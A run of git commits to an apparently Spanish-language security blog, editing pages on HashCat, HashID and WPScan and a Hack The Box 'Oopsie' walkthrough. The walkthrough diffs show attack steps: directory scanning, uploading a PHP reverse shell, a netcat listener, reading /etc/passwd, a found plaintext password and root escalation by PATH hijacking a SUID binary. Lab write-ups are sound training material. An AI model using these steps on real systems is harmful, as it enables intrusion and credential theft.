-applicable law, such partial invalidity or ineffectiveness shall not
-invalidate the remainder of the License, and in such case Affirmer hereby
-affirms that he or she will not (i) exercise any of his or her remaining
-Copyright and Related Rights in the Work or (ii) assert any associated claims
-and causes of action with respect to the Work, in either case contrary to
-Affirmer's express Statement of Purpose.
-
-4. Limitations and Disclaimers.
-
- a. No trademark or patent rights held by Affirmer are waived, abandoned,
- surrendered, licensed or otherwise affected by this document.
-
- b. Affirmer offers the Work as-is and makes no representations or warranties
- of any kind concerning the Work, express, implied, statutory or otherwise,
- including without limitation warranties of title, merchantability, fitness
- for a particular purpose, non infringement, or the absence of latent or
- other defects, accuracy, or the present or absence of errors, whether or not
- discoverable, all to the greatest extent permissible under applicable law.
-
- c. Affirmer disclaims responsibility for clearing rights of other persons
- that may apply to the Work or any use thereof, including without limitation
- any person's Copyright and Related Rights in the Work. Further, Affirmer
- disclaims responsibility for obtaining any necessary consents, permissions
- or other rights required for any use of the Work.
-
- d. Affirmer understands and acknowledges that Creative Commons is not a
- party to this document and has no duty or obligation with respect to this
- CC0 or use of the Work.
-
-For more information, please see
-
From ffd0a4c88c2db03e680149ffdb9f25524f327927 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 21:20:09 +0200
Subject: [PATCH 0065/1701] Delete another-page.md
---
another-page.md | 9 ---------
1 file changed, 9 deletions(-)
delete mode 100644 another-page.md
diff --git a/another-page.md b/another-page.md
deleted file mode 100644
index 03ce0c23db4..00000000000
--- a/another-page.md
+++ /dev/null
@@ -1,9 +0,0 @@
----
-layout: default
----
-
-## Welcome to another page
-
-_yay_
-
-[back](./)
From d43955920dc8d58e38cf83974c0b55f18e4c6e88 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 21:21:20 +0200
Subject: [PATCH 0066/1701] Update _config.yml
---
_config.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/_config.yml b/_config.yml
index b60e65a7834..c24e772bce5 100644
--- a/_config.yml
+++ b/_config.yml
@@ -1,5 +1,5 @@
title: F1r0x
description: Blog sobre Ciberseguridad.
-show_downloads: true
+# show_downloads: true
google_analytics:
theme: jekyll-theme-hacker
From 189891c0f71f540c4aee7f32fc3f3217cf03db9b Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 21:42:08 +0200
Subject: [PATCH 0067/1701] Create Hash-Identifier.md
---
Hash-Identifier.md | 2 ++
1 file changed, 2 insertions(+)
create mode 100644 Hash-Identifier.md
diff --git a/Hash-Identifier.md b/Hash-Identifier.md
new file mode 100644
index 00000000000..315a0a51c98
--- /dev/null
+++ b/Hash-Identifier.md
@@ -0,0 +1,2 @@
+# Hash Identifier
+
From 8e57008c3a6e434242093713c0f7577ec53cae6f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 21:46:28 +0200
Subject: [PATCH 0068/1701] Update HashCat.md
---
HashCat.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/HashCat.md b/HashCat.md
index 166e3da8030..46809f55f16 100644
--- a/HashCat.md
+++ b/HashCat.md
@@ -44,3 +44,5 @@ Crearemos un archivo, por ejemplo 'hash2' y pegamos el número hash que queremos
Guardamos (Cntrl + o) y salimos (Cntrl + x).
+
+
From 11ac05e2765ea13f2c3971b7805f9dd706229df2 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 00:02:52 +0200
Subject: [PATCH 0069/1701] Update HashCat.md
---
HashCat.md | 13 +++++++++++++
1 file changed, 13 insertions(+)
diff --git a/HashCat.md b/HashCat.md
index 46809f55f16..1c61de18f60 100644
--- a/HashCat.md
+++ b/HashCat.md
@@ -43,6 +43,19 @@ Crearemos un archivo, por ejemplo 'hash2' y pegamos el número hash que queremos
Guardamos (Cntrl + o) y salimos (Cntrl + x).
+ Para ejecutar HashCat de forma básica:
+ hashcat -a 0 -m 0 hash2 /usr/share/rockyou.txt
+
+ -a : Attack-mode. El 0 representa el modo 'Straight'.
+
+ 
+
+ -m : Hash-type. El 0 representa MD5. Esto lo podemos ver con el comando ´hashcat --help´.
+
+ 
+
+ hash2 : Nombre del archivo que contiene el hash que queremos descifrar.
+ rockyou.txt : Es un diccionario con más de 14 millones de contraseñas y hashes.
From c8bac1d07755fa8541553d515fd5771b541fe886 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 00:04:35 +0200
Subject: [PATCH 0070/1701] Update HashCat.md
---
HashCat.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/HashCat.md b/HashCat.md
index 1c61de18f60..291c80a93bd 100644
--- a/HashCat.md
+++ b/HashCat.md
@@ -51,7 +51,7 @@ Crearemos un archivo, por ejemplo 'hash2' y pegamos el número hash que queremos

- -m : Hash-type. El 0 representa MD5. Esto lo podemos ver con el comando ´hashcat --help´.
+ -m : Hash-type. El 0 representa MD5. Esto lo podemos ver con el comando 'hashcat --help'.

From e4b31071d78eff0c7b7c88aef9ee60839f7a2dbb Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 00:06:27 +0200
Subject: [PATCH 0071/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 08bfe5e66ba..434f1a8c14b 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -278,7 +278,7 @@ Para instalar:
Para ejecutarlo:
- hash-identifier
+ hash-identifier

From 7d704d2d92a8989584da209de3106f1207c1fc7a Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 00:09:08 +0200
Subject: [PATCH 0072/1701] Update HashCat.md
---
HashCat.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/HashCat.md b/HashCat.md
index 291c80a93bd..0c6e43c3843 100644
--- a/HashCat.md
+++ b/HashCat.md
@@ -51,7 +51,7 @@ Crearemos un archivo, por ejemplo 'hash2' y pegamos el número hash que queremos

- -m : Hash-type. El 0 representa MD5. Esto lo podemos ver con el comando 'hashcat --help'.
+ -m : Hash-type. El 0 representa MD5. Esto lo podemos ver con el comando `hashcat --help`.

From fb9e8d3a0f6b7ab6f5ada64d8400c19d35675be9 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 00:16:04 +0200
Subject: [PATCH 0073/1701] Update Hash-Identifier.md
---
Hash-Identifier.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/Hash-Identifier.md b/Hash-Identifier.md
index 315a0a51c98..2cfab4db9fa 100644
--- a/Hash-Identifier.md
+++ b/Hash-Identifier.md
@@ -1,2 +1,4 @@
+
+
# Hash Identifier
From 8922e5c75d5e5236c5176880f01abd1db156fe29 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 00:17:19 +0200
Subject: [PATCH 0074/1701] Update HashId.md
---
HashId.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/HashId.md b/HashId.md
index 9d735f0d7b5..48e39d7182f 100644
--- a/HashId.md
+++ b/HashId.md
@@ -1,4 +1,4 @@
-# Hashid:
+# HashID
Hashid es una herramienbta que nos reportará el tipo de algoritmo más probable que se utilizó en su día para crear
ese hash a partir de una contraseña.
From 4d6804dc9d58da42c2bec42f5232965f908c461f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 00:19:37 +0200
Subject: [PATCH 0075/1701] Update HashId.md
---
HashId.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/HashId.md b/HashId.md
index 48e39d7182f..ab25c60ab3c 100644
--- a/HashId.md
+++ b/HashId.md
@@ -15,6 +15,7 @@ Para ejecutarla:
hashid [Hash Núm]
+
hashid 2cb42f8734ea607eefed3b70af13bbd3
From cae99aeed2a94e26d28c87cdd5b5d553e0efe179 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 00:23:22 +0200
Subject: [PATCH 0076/1701] Update HashId.md
---
HashId.md | 3 ---
1 file changed, 3 deletions(-)
diff --git a/HashId.md b/HashId.md
index ab25c60ab3c..dbfb60fb42d 100644
--- a/HashId.md
+++ b/HashId.md
@@ -15,9 +15,6 @@ Para ejecutarla:
hashid [Hash Núm]
-
-
- hashid 2cb42f8734ea607eefed3b70af13bbd3
### Ejemplo:
From 84b18970749b30d51c68fefe00b58d2e7e73d9e4 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 00:36:27 +0200
Subject: [PATCH 0077/1701] Update Hash-Identifier.md
---
Hash-Identifier.md | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/Hash-Identifier.md b/Hash-Identifier.md
index 2cfab4db9fa..d0526b560de 100644
--- a/Hash-Identifier.md
+++ b/Hash-Identifier.md
@@ -2,3 +2,10 @@
# Hash Identifier
+Hash Identifier es una herramienta basada en Python que le permite identificar rápidamente los tipos de hash utilizados para cifrar contraseñas.
+Admite más de 220 tipos de hash únicos mediante expresiones regulares.
+
+Es capaz de identificar un solo hash, analizar un archivo o leer varios archivos en un directorio e identificar los hash dentro de ellos.
+También es capaz de incluir el modo hashcat correspondiente y/o el formato [JohnTheRipper](./john_the_ripper.html) en su salida.
+
+
From 75423eef667079ccc3962aa7d35b9ddc4fd905fb Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 00:41:41 +0200
Subject: [PATCH 0078/1701] Update index.md
---
index.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/index.md b/index.md
index 27bbef4c95d..4c93a86826a 100644
--- a/index.md
+++ b/index.md
@@ -21,6 +21,8 @@
[HashID](./HashId.html)
+[Hash Identifier](./Hash-Identifier.html)
+
[HashCat](./HashCat.html)
# Artículos
From 0cafbbba927a852858f7656d792fc3ea8239386a Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 00:52:45 +0200
Subject: [PATCH 0079/1701] Update HTB-Oopsie.md
---
HTB-Oopsie.md | 67 +++++++++++++++++++++++++--------------------------
1 file changed, 33 insertions(+), 34 deletions(-)
diff --git a/HTB-Oopsie.md b/HTB-Oopsie.md
index 43d3a868ebc..9d7c904272e 100644
--- a/HTB-Oopsie.md
+++ b/HTB-Oopsie.md
@@ -8,7 +8,7 @@ En primer lugar, vamos a comprobar si tenemos conexión
con la máquina. Y si podemos averiguar el sistema
operativo que utiliza mediante el ttl.
- ping [Ip Víctima]
+ ping [Ip Víctima]

@@ -17,7 +17,7 @@ En primer lugar, vamos a comprobar si tenemos conexión
Ahora podemos escanear los puertos mediante nmap.
- nmap -p- --open -T5 -n -v [Ip Víctima] -oG allPorts
+ nmap -p- --open -T5 -n -v [Ip Víctima] -oG allPorts

@@ -44,7 +44,7 @@ En primer lugar, vamos a comprobar si tenemos conexión
Ahora pasaremos a realizar un escaneo más exhaustivo:
- nmap -sC -sV -v -p22,80 [Ip Víctima] -oN target
+ nmap -sC -sV -v -p22,80 [Ip Víctima] -oN target

@@ -228,7 +228,7 @@ de GitHub mediante el siguiente enlace: https://github.com/F1r0x/php-reverse-she
Para tenerlo, simplemente lo copiáis, abrís una terminal y crearemos el archivo mediante nano:
- nano php-reverse-shell.php
+ nano php-reverse-shell.php
Pegamos todo el script, guardamos (Cntrl + o) y salimos (Cntrl + x).
@@ -244,7 +244,7 @@ en escucha.
Abrimos una terminar y modificamos el archivo php-reverse-shell.php
- sudo nano php-reverse-shell.php
+ sudo nano php-reverse-shell.php

@@ -252,7 +252,7 @@ Abrimos una terminar y modificamos el archivo php-reverse-shell.php
Establecemos nuestra Ip (tun0) y el puerto de escucha (en este ejemplo usaremos el 8080). Para saber
cuál es nuestra Ip, podemos verlo mediante el comando 'ipconfig':
- sudo ifconfig
+ sudo ifconfig

@@ -289,7 +289,7 @@ Perfecto, ya tendríamos nuestro archivo subido.
Para ponernos en escucha, abrimos una terminal y ejecutamos el siguiente comando:
- nc -lnvp 8080
+ nc -lnvp 8080
-l : Sirve para que Netcat abra un puerto y se mantenga ala escucha. Se aceptará una única conexión de un
único cliente antes de cerrarse.
@@ -313,7 +313,7 @@ así como subdominios DNS.
Para instalarlo simplemente ejecutamos:
- sudo apt install gobuster
+ sudo apt install gobuster
Y también tendremos que descargar los repositorios de direcciones, en esta ocasión utilizaremos un
repositorio llamado 'wordlists' y en concreto la lista de directorios 'directory-list-2.3-small.txt.
@@ -329,13 +329,13 @@ Para instalarlo simplemente ejecutamos:
En ese enlace encontraréis la biblioteca que vamos a utilizar, yo recomiendo instalarlo en el siguiente
directorio, si el directorio no existe crearlo.:
- /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
+ /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Bien, ya tenemos nuestro Gobuster y nuestra biblioteca de directorios, ahora toca lanzar la herramienta a ver
que nos reporta:
- gobuster dir --url http://[Ip Víctima]/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php
+ gobuster dir --url http://[Ip Víctima]/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php
Ahora gobuster empezará a realizar pruebas y a mostrarnos resultados a medida que avanza. No tenemos que esperar a
que finalice, simplemente fijaros en cuales son los directorios que reporta y ir probando a ver cuáles son
@@ -348,13 +348,13 @@ Para instalarlo simplemente ejecutamos:
En este caso hemos tenido suerte, ya que al poco de buscar ha encontrado una ruta que nos dirige al directorio
Uploads.
- http://[Ip Víctima]/uploads/
+ http://[Ip Víctima]/uploads/
Una vez hecho esto nos dirigiremos al navegador y trataremos de introducir la siguiente ruta:
- http://[Ip Víctima]/uploads/php-reverse-shell.php
+ http://[Ip Víctima]/uploads/php-reverse-shell.php
- 
+
Una vez realizado esto, volvemos a la terminal donde se encontraba el 'netcat' y debería de haberse abierto
nuestra shell.
@@ -380,15 +380,14 @@ Para instalarlo simplemente ejecutamos:
Mediante el comando 'cat' podemos ver en la terminal el contenido del archivo:
- cat user.txt
+ cat user.txt

Ahora, para poder trabajar de manera más cómoda y tratar de escalarar privilegios, primero, abriremos una shell
más funcional. Para ello volvemos al directorio principal mediante cd y ejecutamos el siguiente comando:
-
- python3 -c 'import pty;pty.spawn("/bin/bash")'
+ python3 -c 'import pty;pty.spawn("/bin/bash")'

@@ -415,7 +414,7 @@ Con grep utilizaremos el patrón 'passw' para tratar de roportar todas los resul
passwd o password por ejemplo). También usaremos -i para ignorar las palabras sensibles a mayúsculas y minúsculas
como por ejemplo las contraseñas en este caso.
- cat * | grep -i passw*
+ cat * | grep -i passw*

@@ -425,14 +424,14 @@ como por ejemplo las contraseñas en este caso.
Para poder verificar los usuarios disponibles en el sistema, podemos leer el archivo /etc/passwd y tratar
de reutilizar la contrasña encontrada en alguna cuenta con altros privilegios.
- cat /etc/passwd
+ cat /etc/passwd

Podemos ver como tenemos un usuario llamado 'robert'. Vamos a tratar de entrar como este usuario mediante el
comando 'su' y con la contraseña previamente encontrada.
- su robert
+ su robert

@@ -442,14 +441,14 @@ revisando los archivos ".php" y ".js" de manera manual en busca de algo más.
Tras revisar los cuatro archivos, vemos que en el archivo 'db.php' encontramos la siguiente información:
- cat db.php
+ cat db.php

Como podéis ver aparecen cuatro palabras que podemos probar como contraseñas, tras probarlas vemos como la
contraseña del usuario 'robert' es "M3g4C0rpUs3r!"
- su robert
+ su robert

@@ -460,9 +459,9 @@ Finalmente, estamos como el usuario 'robert', podemos comprobarlo utilizando el
Ahora podemos ir al directorio principal /home/robert y veremos como ahí está nuestro archivo user.txt con
nuestra primera flag que ya habíamos visto anteriormente sin necesidad de ningún privilegio.
- cd /home/robert
+ cd /home/robert
- cat user.txt
+ cat user.txt

@@ -472,7 +471,7 @@ Pero nosotros lo que buscamos es la flag del super usuario y para ello debemos d
En primer lugar, trataremos de iniciar sesión como super usuario mediante 'sudo':
- sudo su robert
+ sudo su robert

@@ -485,13 +484,13 @@ utilizaremos el comando 'id':
Vemos como el usuario robert es parte del grupo 'bugtracker'. Ahora, intentemos ver si hay algún
binario dentro de ese grupo:
- find / -group bugtracker 2>/dev/null
+ find / -group bugtracker 2>/dev/null

Nos ha reportado un archivo llamado 'bugtracker'. Ahora comprobamos qué privilegio y qué tipo de archivo es:
- ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker
+ ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker

@@ -506,7 +505,7 @@ que tiene configurado SUID.
Para ello ejecutamos 'bugtacker':
- /usr/bin/bugtracker
+ /usr/bin/bugtracker

@@ -518,20 +517,20 @@ La herramienta acepta la entrada del usuario como nombre del archivo que se leer
Para ello nos dirigiremos al directorio '/tmp':
- cd /tmp
+ cd /tmp

Y crearemos un archivo 'cat' que contenga la siguiente ruta '/bin/sh':
- echo '/bin/sh' > cat
+ echo '/bin/sh' > cat

Ahora le tenemos que dar privilegios de ejecución:
- chmod +x cat
+ chmod +x cat

@@ -543,13 +542,13 @@ PATH es una variable de entorno en sistemas operativos similares a Unix, DOS, OS
Por tanto, debemos introducir el directorio 'tmp' en el archivo PATH
para poder ejecutarlo correctamente. Para ello utilizamos el siguiente comando:
- export PATH=/tmp:$PATH
+ export PATH=/tmp:$PATH

Para confirmar que todo ha salido correctamente y verificar que el directorio 'tmp' está en PATH:
- echo $PATH
+ echo $PATH

@@ -562,11 +561,11 @@ Genial, ya estamos registrados como 'root'. Finalmente, nos dirigimos al directo
Para poder leer el archvio nos registramos como super usuarios:
- sudo su
+ sudo su
Y abrimos el archivo con 'cat' donde encontramos la última Flag:
- cat root.txt
+ cat root.txt

From 66bfc157733bf81dc3486d7fe9ded050e54af238 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 00:55:33 +0200
Subject: [PATCH 0080/1701] Update HTB-Oopsie.md
---
HTB-Oopsie.md | 9 +++++----
1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/HTB-Oopsie.md b/HTB-Oopsie.md
index 9d7c904272e..d36388f355f 100644
--- a/HTB-Oopsie.md
+++ b/HTB-Oopsie.md
@@ -101,7 +101,7 @@ En primer lugar, vamos a comprobar si tenemos conexión
más comunes y no he tenido suerte) vamos a acceder como invitados. Para ello le daremos a la opción Login as
Gues y tendremos acceso como invitados.
- 
+
Podemos ver que tenemos diferentes pestañas, vamos a revisarlas una por una para ver la información que nos
aportan:
@@ -155,7 +155,7 @@ actual son iguales a 2.
También me llama la atención como en la url de la pestaña nos especifica la id=2
- 
+
Y otra cosa importante, son las cookies de inicio de sesión que hemos encontrado.
@@ -176,7 +176,7 @@ pestaña Upload, así que seguimos probando.
Vemos como tras muchos intentos vacíos, nos muestra algunos usuarios.
- 
+
Finalmente, tras 30 intentos, lo conseguimos. El id=30 pertenece al usuario 'super admin'.
@@ -273,6 +273,7 @@ Para ello simplemente vamos a la página, pulsamos examinar:

Seleccionamos nuestra reverse-shell:
+

Y finalmente pulsamos Upload:
@@ -341,7 +342,7 @@ Para instalarlo simplemente ejecutamos:
que finalice, simplemente fijaros en cuales son los directorios que reporta y ir probando a ver cuáles son
funcionales.
- 
+
Para el proceso: Cntrl + c
From ec4aa928d93fac6f478a14273fb23c4bd92c0634 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 02:02:55 +0200
Subject: [PATCH 0081/1701] Create WPScan.md
---
WPScan.md | 36 ++++++++++++++++++++++++++++++++++++
1 file changed, 36 insertions(+)
create mode 100644 WPScan.md
diff --git a/WPScan.md b/WPScan.md
new file mode 100644
index 00000000000..72ac309838e
--- /dev/null
+++ b/WPScan.md
@@ -0,0 +1,36 @@
+
+
+# WPScan
+
+WPScan es un escaner de vulnerabilidades enfocado en página WordPress. Escanea y encuentra fallas y vulnerabilidades en el código, los módulos y temas
+utilizados.
+
+## Instalación:
+
+Para instalar en sistemas Debian:
+
+ sudo apt-get install wpscan
+
+## Actualizar base de datos:
+
+Debido a las multiples actualizaciones, tanto por parte de wordpress como por WPScan, debemos tener actualizada nuesta base de datos para estar
+preparado frente a las nuevos ataques y vulnerabilidades.
+
+ wpscan --update
+
+## Ver Información de la Herramienta:
+
+Aquí podemos ver todas las opciones y funciones que nos ofrece WPScan.
+
+ wpscan -h
+
+## Escaneo Básico:
+
+Ejemplo 1:
+
+ wpscan --url http://wordpress.local
+
+Ejemplo 2:
+
+ wpscan --url http://10.10.11.143
+
From 5216c0a9e437232cc084302001d722bf35c05f15 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 02:04:56 +0200
Subject: [PATCH 0082/1701] Update index.md
---
index.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/index.md b/index.md
index 4c93a86826a..6eb55903e89 100644
--- a/index.md
+++ b/index.md
@@ -25,6 +25,8 @@
[HashCat](./HashCat.html)
+[WPScan](./WPScan.html)
+
# Artículos
[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB.html)
From f4d8c9b653c5a69bda28a0c403eade9017a42388 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 02:10:00 +0200
Subject: [PATCH 0083/1701] Update WPScan.md
---
WPScan.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/WPScan.md b/WPScan.md
index 72ac309838e..feca52ef7cf 100644
--- a/WPScan.md
+++ b/WPScan.md
@@ -1,4 +1,5 @@
-
+
+
# WPScan
From 18dc93f08b87c004183e56f801e87da96102a7b4 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 02:17:48 +0200
Subject: [PATCH 0084/1701] Update WPScan.md
---
WPScan.md | 17 +++++++++++++++++
1 file changed, 17 insertions(+)
diff --git a/WPScan.md b/WPScan.md
index feca52ef7cf..ef4252dbc3e 100644
--- a/WPScan.md
+++ b/WPScan.md
@@ -35,3 +35,20 @@ Ejemplo 2:
wpscan --url http://10.10.11.143
+## Escaneo mediante verbose:
+
+Ejemplo 1:
+
+ wpscan --url http://wordpress.local --verbose
+
+Ejemplo 2:
+
+ wpscan --url http://10.10.11.143 -v
+
+## Escaneo de directorios y usuarios:
+
+ wpscan --url http://example.local --wp-content-dir wp-admin
+
+
+
+
From 3110dafea676efbda010da0ac2d639eeb601ea9e Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 10:35:33 +0200
Subject: [PATCH 0085/1701] Delete CONTRIBUTING.md
---
docs/CONTRIBUTING.md | 88 --------------------------------------------
1 file changed, 88 deletions(-)
delete mode 100644 docs/CONTRIBUTING.md
diff --git a/docs/CONTRIBUTING.md b/docs/CONTRIBUTING.md
deleted file mode 100644
index 37bc385828b..00000000000
--- a/docs/CONTRIBUTING.md
+++ /dev/null
@@ -1,88 +0,0 @@
-# Contributing to the Hacker theme
-
-Hi there! We're thrilled that you'd like to contribute to the Hacker theme. Your help is essential for keeping it great.
-
-the Hacker theme is an open source project supported by the efforts of an entire community and built one contribution at a time by users like you. We'd love for you to get involved. Whatever your level of skill or however much time you can give, your contribution is greatly appreciated. There are many ways to contribute, from writing tutorials or blog posts, improving the documentation, submitting bug reports and feature requests, helping other users by commenting on issues, or writing code which can be incorporated into the Hacker theme itself.
-
-Following these guidelines helps to communicate that you respect the time of the developers managing and developing this open source project. In return, they should reciprocate that respect in addressing your issue, assessing changes, and helping you finalize your pull requests.
-
-
-## Looking for support?
-
-We'd love to help. Check out [the support guidelines](SUPPORT.md).
-
-## How to report a bug
-
-Think you found a bug? Please check [the list of open issues](https://github.com/pages-themes/hacker/issues) to see if your bug has already been reported. If it hasn't please [submit a new issue](https://github.com/pages-themes/hacker/issues/new).
-
-Here are a few tips for writing *great* bug reports:
-
-* Describe the specific problem (e.g., "widget doesn't turn clockwise" versus "getting an error")
-* Include the steps to reproduce the bug, what you expected to happen, and what happened instead
-* Check that you are using the latest version of the project and its dependencies
-* Include what version of the project your using, as well as any relevant dependencies
-* Only include one bug per issue. If you have discovered two bugs, please file two issues
-* Even if you don't know how to fix the bug, including a failing test may help others track it down
-
-**If you find a security vulnerability, do not open an issue. Please email security@github.com instead.**
-
-## How to suggest a feature or enhancement
-
-If you find yourself wishing for a feature that doesn't exist in the Hacker theme, you are probably not alone. There are bound to be others out there with similar needs. Many of the features that the Hacker theme has today have been added because our users saw the need.
-
-Feature requests are welcome. But take a moment to find out whether your idea fits with the scope and goals of the project. It's up to you to make a strong case to convince the project's developers of the merits of this feature. Please provide as much detail and context as possible, including describing the problem you're trying to solve.
-
-[Open an issue](https://github.com/pages-themes/hacker/issues/new) which describes the feature you would like to see, why you want it, how it should work, etc.
-
-
-
-## Your first contribution
-
-We'd love for you to contribute to the project. Unsure where to begin contributing to the Hacker theme? You can start by looking through these "good first issue" and "help wanted" issues:
-
-* [Good first issues](https://github.com/pages-themes/hacker/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22) - issues which should only require a few lines of code and a test or two
-* [Help wanted issues](https://github.com/pages-themes/hacker/issues?q=is%3Aissue+is%3Aopen+label%3A%22help+wanted%22) - issues which may be a bit more involved, but are specifically seeking community contributions
-
-*p.s. Feel free to ask for help; everyone is a beginner at first* :smiley_cat:
-
-## How to propose changes
-
-Here's a few general guidelines for proposing changes:
-
-* If you are making visual changes, include a screenshot of what the affected element looks like, both before and after.
-* Follow the [Jekyll style guide](https://ben.balter.com/jekyll-style-guide).
-* If you are changing any user-facing functionality, please be sure to update the documentation
-* Each pull request should implement **one** feature or bug fix. If you want to add or fix more than one thing, submit more than one pull request
-* Do not commit changes to files that are irrelevant to your feature or bug fix
-* Don't bump the version number in your pull request (it will be bumped prior to release)
-* Write [a good commit message](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html)
-
-At a high level, [the process for proposing changes](https://guides.github.com/introduction/flow/) is:
-
-1. [Fork](https://github.com/pages-themes/hacker/fork) and clone the project
-2. Configure and install the dependencies: `script/bootstrap`
-3. Make sure the tests pass on your machine: `script/cibuild`
-4. Create a new branch: `git checkout -b my-branch-name`
-5. Make your change, add tests, and make sure the tests still pass
-6. Push to your fork and [submit a pull request](https://github.com/pages-themes/hacker/compare)
-7. Pat your self on the back and wait for your pull request to be reviewed and merged
-
-**Interesting in submitting your first Pull Request?** It's easy! You can learn how from this *free* series [How to Contribute to an Open Source Project on GitHub](https://egghead.io/series/how-to-contribute-to-an-open-source-project-on-github)
-
-## Bootstrapping your local development environment
-
-`script/bootstrap`
-
-## Running tests
-
-`script/cibuild`
-
-## Code of conduct
-
-This project is governed by [the Contributor Covenant Code of Conduct](CODE_OF_CONDUCT.md). By participating, you are expected to uphold this code.
-
-## Additional Resources
-
-* [Contributing to Open Source on GitHub](https://guides.github.com/activities/contributing-to-open-source/)
-* [Using Pull Requests](https://help.github.com/articles/using-pull-requests/)
-* [GitHub Help](https://help.github.com)
From 9a61d0fe11e0dd3382632f8786503201181c7ee3 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 10:36:01 +0200
Subject: [PATCH 0086/1701] Delete CODE_OF_CONDUCT.md
---
docs/CODE_OF_CONDUCT.md | 46 -----------------------------------------
1 file changed, 46 deletions(-)
delete mode 100644 docs/CODE_OF_CONDUCT.md
diff --git a/docs/CODE_OF_CONDUCT.md b/docs/CODE_OF_CONDUCT.md
deleted file mode 100644
index ab1a9a1d8a2..00000000000
--- a/docs/CODE_OF_CONDUCT.md
+++ /dev/null
@@ -1,46 +0,0 @@
-# Contributor Covenant Code of Conduct
-
-## Our Pledge
-
-In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
-
-## Our Standards
-
-Examples of behavior that contributes to creating a positive environment include:
-
-* Using welcoming and inclusive language
-* Being respectful of differing viewpoints and experiences
-* Gracefully accepting constructive criticism
-* Focusing on what is best for the community
-* Showing empathy towards other community members
-
-Examples of unacceptable behavior by participants include:
-
-* The use of sexualized language or imagery and unwelcome sexual attention or advances
-* Trolling, insulting/derogatory comments, and personal or political attacks
-* Public or private harassment
-* Publishing others' private information, such as a physical or electronic address, without explicit permission
-* Other conduct which could reasonably be considered inappropriate in a professional setting
-
-## Our Responsibilities
-
-Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
-
-Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
-
-## Scope
-
